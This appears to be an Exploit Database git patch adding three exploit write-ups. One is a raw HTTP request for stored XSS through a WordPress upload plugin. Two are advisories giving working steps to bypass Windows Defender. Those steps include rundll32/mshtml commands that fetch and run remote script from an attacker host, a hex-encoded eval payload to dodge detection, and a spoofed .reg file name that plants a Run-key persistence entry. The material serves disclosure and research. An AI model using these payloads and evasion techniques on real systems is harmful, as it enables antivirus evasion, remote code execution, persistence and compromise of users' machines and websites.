From 00e20a3a1cfd55fd86aba8b9b9b88147b7776280 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 Jan 2022 05:01:58 +0000 Subject: [PATCH] DB: 2022-01-13 3 changes to exploits/shellcodes Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass Microsoft Windows Defender - Detections Bypass WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated) --- exploits/php/webapps/50655.txt | 118 +++++++++++++++++ exploits/windows/local/50653.txt | 215 +++++++++++++++++++++++++++++++ exploits/windows/local/50654.txt | 118 +++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 454 insertions(+) create mode 100644 exploits/php/webapps/50655.txt create mode 100644 exploits/windows/local/50653.txt create mode 100644 exploits/windows/local/50654.txt diff --git a/exploits/php/webapps/50655.txt b/exploits/php/webapps/50655.txt new file mode 100644 index 000000000..c808aaff1 --- /dev/null +++ b/exploits/php/webapps/50655.txt @@ -0,0 +1,118 @@ +# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated) +# Date: 10/01/2022 +# Exploit Author: Veshraj Ghimire +# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/ +# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/ +# Version: 1.3.2 +# Tested on: Windows 10 - Chrome, WordPress 5.8.2 +# CVE : CVE-2021-24563 + +# References: + +https://www.youtube.com/watch?v=lfrLoHl4-Zs +https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1 + +# Description: + +The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly + + +# Proof Of Concept: + + +POST /wp-admin/admin-ajax.php HTTP/1.1 + +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-GB,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: multipart/form-data; +boundary=---------------------------124662954015823207281179831654 + +Content-Length: 1396 + +Connection: close + +Upgrade-Insecure-Requests: 1 + + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="post_ID" + + +1247 + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="post_title" + + +test + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="post_content" + + +test + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="files[]"; filename="xss.html" + +Content-Type: text/html + + + + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="action" + + +upload_ugc + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="form_layout" + + +image + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="fu_nonce" + + +021fb612f9 + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="_wp_http_referer" + + +/wordpress/frontend-uploader-form/ + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="ff" + + +92b6cbfa6120e13ff1654e28cef2a271 + +-----------------------------124662954015823207281179831654 + +Content-Disposition: form-data; name="form_post_id" + + +1247 + +-----------------------------124662954015823207281179831654-- + + + +Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html \ No newline at end of file diff --git a/exploits/windows/local/50653.txt b/exploits/windows/local/50653.txt new file mode 100644 index 000000000..f4fc336e2 --- /dev/null +++ b/exploits/windows/local/50653.txt @@ -0,0 +1,215 @@ +# Exploit Title: Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass +# Exploit Author: John Page (aka hyp3rlinx) +# Website: hyp3rlinx.altervista.org +# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt +# twitter.com/hyp3rlinx +# ISR: ApparitionSec + +[Vendor] +www.microsoft.com + +A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. +.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. + + +[Vulnerability Type] +Windows .Reg File Dialog Spoof - Mitigation Bypass + + +[CVE Reference] +N/A + +[Security Issue] +Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message. +This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or +whatever else an attacker would like to display. + +This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the +registry security warning dialog box LIE to them as the warning messages are now under an attacker's control. + +The way it works is using a specially crafted .Reg filename, this allows control of the registry warning dialog message presented to an end user. + +Recently, I noticed in 2022 .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe. +Therefore, something has changed in the OS, possibly a silent mitigation hmmm. Wouldn't be the first time, back in 2016 my msinfo32.exe +.NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin and that one allowed remote file access data theft. + +In an threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update" +Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711 + +However, the "fix" is easily bypassed and the old payload can still be made to work across systems. + +Bypassing .Reg spoofing fix was only the start, I had to find ways to bypass two different Windows Defender detections along the way for the PoC. + +Trojan:Win32/Powessere.G +https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427 + +Backdoor:JS/Relvelshe.A +https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426 + +Lets begin... + +My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read. + +00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 | +00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename +00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE +00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes +00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" +00007FFE7A4A7C92 | 85 C9 | test ecx,ecx + +00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7 + +ntdll!woutput_l+0x387: +00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=???? +======================================================================================================================================== + +Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day) +to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and with minor tweaks on Win-10. + +Original works on Win-7, but crashes regedit.exe on Win-10: +Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg + +Original payload (first mitigation bypass) works Win-7/Win-10: +Remove second to last byte (%1) before the %0 string terminator and %b characters Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg + +New payload mitigation bypass works on both Win-7 and Win-10: +Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg + +However, we are NOT done yet as we must deal with Windows Defender detection preventions. + +1) Trojan:Win32/Powessere.G +2) Backdoor:JS/Relvelshe.A + +Bypassing "Trojan:Win32/Powessere.G" +===================================== +Two components required to defeat Trojan:Win32/Powessere.G detection in Windows Defender. + +A) extra path traversal when referencing mshtml ..\\..\\..\\ +B) concatenation when constructing the remote server URL scheme "script"+":"+"http. + +FAIL on current updated Windows 10 +C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1) +Access is denied. + +SUCCESSFUL on current updated Windows 10 +Using an extra ..\ results in a bypass, but does nothing useful just an alert box. +C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(1) + +Trying to download and execute remote code using the payload below fails again, as we need the second component URL scheme concat. +C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.45/hi.tmp") +Access is denied. + +Jscript concatenation of the URL scheme. +document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp") + +Successfully bypasses "Trojan:Win32/Powessere.G" detection! +C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp") + +Final hurdle we face, Windows defender detects the below downloaded file named "backdoor" as Backdoor:JS/Relvelshe.A and removes it from INetCache. +"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\backdoor[1]" + +File "backdoor" contents. + + + + + + + + +Bypassing "Backdoor:JS/Relvelshe.A" detection. +============================================== +The way we do this is to Hex encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe") +Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. + +var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; +var str = ''; +for (var n = 0; n < hex.length; n += 2) { +str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); +} +eval(str) + + +Done!, successfully bypassed the .Reg spoof mitigation and two Windows Defender detections. Long Live Windows .Reg file dialog spoofing Flaw! + + +[References] +Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt +https://threatpost.com/windows-bug-spoof-dialog-boxes/142711/ + + +[Mitigation Bypass, New PoC Video URL] +https://www.youtube.com/watch?v=QANX45jieoo + + +[Exploit/PoC/2022] +Note: The circa 2019 advisory exploit abused "Image File Execution Options" to store the payload as a debugger setting for MSIE. +Unfortunately, that no longer works, so we will make do for now with storing the payload on disk in a .cmd file and registry Run key. + +1) Create a .Reg Dialog Spoofing file named, Sales_Report_2022.%n%nClick YES to cancel%0.reg with below contents +OR use the original payload with minor alterations. Sales_Report_2022.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg +I prefer the original because the % characters help obscure the obvious wording in the filename. + +Windows Registry Editor Version 5.00 + +[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] +"HATE"="C:\\dump\\s.cmd" + + +2) Create a Windows .cmd file, "s.cmd", with below contents. Unfortunately, it needs to be stored on disk using the path as referenced in the .Reg file above, +update server IP as required. + +rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp") + + +3) Create the remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell. + + + + + + + +4) Logout and log back into Windows, BOOM calc.exe runs! + + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +Original Vendor Notification: March 1, 2019 +Original MSRC Response: " A registry file was created with the title you suggested, but the error message was clear." +Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability". +March 10, 2019 : Public Disclosure + +Vendor Notification: +January 10, 2022 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/50654.txt b/exploits/windows/local/50654.txt new file mode 100644 index 000000000..d83cc09be --- /dev/null +++ b/exploits/windows/local/50654.txt @@ -0,0 +1,118 @@ +# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass +# Exploit Author: John Page (aka hyp3rlinx) +# Website: hyp3rlinx.altervista.org +# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt +# twitter.com/hyp3rlinx +# ISR: ApparitionSec + +[Vendor] +www.microsoft.com + + +[Product] +Windows Defender + +Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together +machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in +your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your +device and in the cloud. + + +[Vulnerability Type] +Windows Defender Detection Bypass +TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A + + +[CVE Reference] +N/A + + +[Security Issue] +Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail +and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml. + +C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1) +Access is denied. + +Pass an extra "..\" to the path. +C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666) + +Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp"). +However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload. + +C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp") +Access is denied. + +Full bypass E.g. + +C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp") + +Enter, Backdoor:JS/Relvelshe.A detection. + +Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache. +"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]" + +However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe"). +Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. + + +[References] +Trojan:Win32/Powessere.G +https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427 + +Backdoor:JS/Relvelshe.A +https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426 + +Advisory: +https://twitter.com/hyp3rlinx/status/1480651583172091904 + + +[Exploit/PoC] +1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection. + +python -m http.server 80 + +"hi.tmp" + + + + + + + +2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp") + + +BOOM! + + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +January 10, 2022 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9efb20fbf..976ad4a0a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11430,6 +11430,8 @@ id,file,description,date,author,type,platform,port 50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows, 50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows, 50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows, +50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows, +50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44732,3 +44734,4 @@ id,file,description,date,author,type,platform,port 50648,exploits/php/webapps/50648.txt,"Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php, 50649,exploits/php/webapps/50649.txt,"Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php, 50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Dominic Clark",webapps,php, +50655,exploits/php/webapps/50655.txt,"WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Veshraj Ghimire",webapps,php,